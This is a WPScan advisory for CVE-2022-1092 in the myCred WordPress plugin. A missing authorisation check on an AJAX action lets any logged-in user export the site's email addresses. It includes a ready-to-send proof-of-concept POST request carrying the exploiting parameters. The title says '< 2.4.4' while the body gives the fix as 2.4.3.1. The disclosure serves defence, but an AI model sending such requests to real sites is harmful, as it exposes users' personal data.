WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

myCred < 2.4.4 - Subscriber+ Import/Export to Email Address Disclosure

Description

The plugin does not have authorisation and CSRF checks in its mycred-tools-import-export AJAX action, allowing any authenticated user to call and and retrieve the list of email address present in the blog

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 130
Cookie: [any authenticated user]

action=mycred-tools-import-export&request_tab=points&request=export&template=raw&user_field=email&types=%5B%22mycred_default%22%5D

Affects Plugins

mycred
Fixed in version 2.4.3.1

References

CVE
CVE-2022-1092

Classification

Type

NO AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher

David Hamann

Submitter

David Hamann

Submitter website
https://davidhamann.de
Submitter twitter
d_hamann
Verified

Yes

WPVDB ID
95759d5c-8802-4493-b7e5-7f2bc546af61

Timeline

Publicly Published

2022-03-29 (about 3 months ago)

Added

2022-03-29 (about 3 months ago)

Last Updated

2022-04-11 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin